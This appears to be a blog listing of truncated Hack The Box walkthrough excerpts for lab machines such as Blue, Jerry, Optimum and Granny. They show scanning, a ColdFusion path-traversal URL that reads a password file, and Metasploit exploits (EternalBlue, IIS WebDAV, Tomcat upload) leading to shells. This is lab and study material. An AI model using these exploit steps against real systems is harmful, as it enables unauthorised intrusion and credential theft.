HTB Artic

$sudo nmap -A -T4 -p- 10.10.10.11 8500/tcp open fmtp?This is an odd open port. Let’s check it. Access to http://10.10.10.11:8500/ These files are part of a Cold Fusion 8 installation.http://10.10.10.11:8500/CFIDE/administrator/ $searchsploit ColdFusion $searchsploit -x 14641 Access to http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en What is Rds? ColdFusion RDS is a security component of ColdFusion Server used by the ColdFusion Administratorand ColdFusion Studio to provide remote HTTP-access to files and databases.You can use RDS to manage

GIT Workflow

HTB Blocky

$nmap -T4 -p- -sV -A 10.10.10.37 Open Ports: 21/tcp    open   ftp       ProFTPD 1.3.5a 22/tcp    open   ssh       OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) 80/tcp    open   http      Apache httpd 2.4.18 ((Ubuntu)) 25565/tcp open   minecraft Minecraft 1.11.2 http-generator: WordPress 4.8 $gobuster dir -u 10.10.10.37 -w /usr/share/wordlists/dirb/common.txt -e PhpMyAdmin login site: WordPress admim login site: Uploads folder

HTB Granny

$nmap -T4 -A -sV -p- 10.10.10.15 $nmap -p 80 –script vuln 10.10.10.15 $gobuster dir -u 10.10.10.15 -w /usr/share/wordlists/dirb/common.txt -e $nikto -h 10.10.10.15 Based on Grandpa’s vulnerability… msf5 > search CVE-2017-7269 msf5 > use 0 msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > options msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) >set rhosts 10.10.10.15  msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set lhost 10.10.14.8 msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run meterpreter > getuid meterpreter > shell c:\windows\system32\inetsrv>whoami meterpreter > run post/multi/recon/local_exploit_suggester  meterpreter > getpid meterpreter > ps

HTB Grandpa

$nmap -T4 -sV -A -p- 10.10.10.14 Open Ports: 80/tcp open http Microsoft IIS httpd 6.0 This format seems to be an old version of IIS.According to https://es.wikipedia.org/wiki/Internet_Information_Services, we are working with a Windows Vista (Solo Business y Ultimate) y Windows Server 2008. $gobuster dir -u 10.10.10.14 -w /usr/share/wordlists/dirb/common.txt -e $nikto -h 10.10.10.14 Seems that IIS 6.0 is vulnerable to a zero-day Buffer Overflow vulnerability (CVE-2017-7269).Let’s follow this path. More information

HTB Bashed

$nmap -T4 -A -sV -p- 10.10.10.68 Access to http://10.10.10.68 $nikto -h 10.10.10.68 $gobuster dir -u http://10.10.10.68 -w /usr/share/wordlists/dirb/common.txt -e www-data@bashed:/var/www/html/dev# cd /home/www-data@bashed :/home# ls www-data@bashed :/home# cd arrexelwww-data@bashed :/home/arrexel# cat user.txt www-data@bashed:/var/www/html/dev# sudo -l The command ​sudo -l​ reveals that the ​www-data​ user can run any command as scriptmanager​.Running the command ​sudo -u scriptmanager bash -i​ will spawn a bash shell www-data@bashed:/# ls -la www-data@bashed :/# sudo cd scriptmanager www-data@bashed

HTB Nibbles

$nmap -A -sV -T4 -p- 10.10.10.75 Open ports: 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) Access to http://10.10.10.75/ Do we have a /nibbleblog directory? Access to http://10.10.10.75/nibbleblog/ $nikto -h http://10.10.10.75/nibbleblog/ Results: OSVDB-29786: /nibbleblog/admin.php?en_log_id=0&action=config: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected. OSVDB-29786: /nibbleblog/admin.php?en_log_id=0&action=users: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access.

HTB Optimum

$nmap -A -sV -p- 10.10.10.8 $nikto -h 10.10.10.8 $searchsploit hfs $cat /usr/share/exploitdb/exploits/windows/remote/346 msf5 > search hfs msf5 > use 1 msf5 exploit(windows/http/rejetto_hfs_exec) > options msf5 exploit(windows/http/rejetto_hfs_exec) > set rhost 10.10.10.8 msf5 exploit(windows/http/rejetto_hfs_exec) > run meterpreter > ls meterpreter > cat user.txt.txt meterpreter > getuid meterpreter > sysinfo Sysinfo shows that we are in a Windows 2012 R2 server with x64 bits architecture. Due to the fact that the default reverse_tcp

HTB Blue

$nmap -A -T4 -p- -sV 10.10.10.40 Result analysis:   135: windows rpc 139: smb  445: smb  OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1) $nmap -p 445 –script vuln 10.10.10.40 msf5 > use exploit/windows/smb/ms17_010_eternalblue msf5 exploit(windows/smb/ms17_010_eternalblue) > options msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost 10.10.10.40 msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit C:\Windows\system32>whoami C:\Users>dir C:\Users>cd haris C:\Users\haris>cd Desktop C:\Users\haris\Desktop>dir C:\Users\haris\Desktop>type user.txt C:\Users>cd Administrator C:\Users\Administrator>cd Desktop C:\Users\Administrator\Desktop>dir C:\Users\Administrator\Desktop>type root.txt

HTB Jerry

$nmap -A -T4 -p- -sV -Pn 10.10.10.95 $gobuster dir -u http://10.10.10.95:8080 -w /usr/share/wordlists/dirb/common.txt -e $nikto -h 10.10.10.95:8080 Access to http://10.10.10.95:8080/manager/html  Use credentials found on Nikto’s results (tomcat/s3cret) As we can observe, we are able to upload and deploy a WAR file. msf5 > use exploit/multi/http/tomcat_mgr_uploadmsf5 exploit(multi/http/tomcat_mgr_upload) > options msf5 exploit(multi/http/tomcat_mgr_upload) > set HttpPassword s3cret msf5 exploit(multi/http/tomcat_mgr_upload) > set HttpUsername tomcat msf5 exploit(multi/http/tomcat_mgr_upload) > set rhost 10.10.10.95 msf5 exploit(multi/http/tomcat_mgr_upload) > set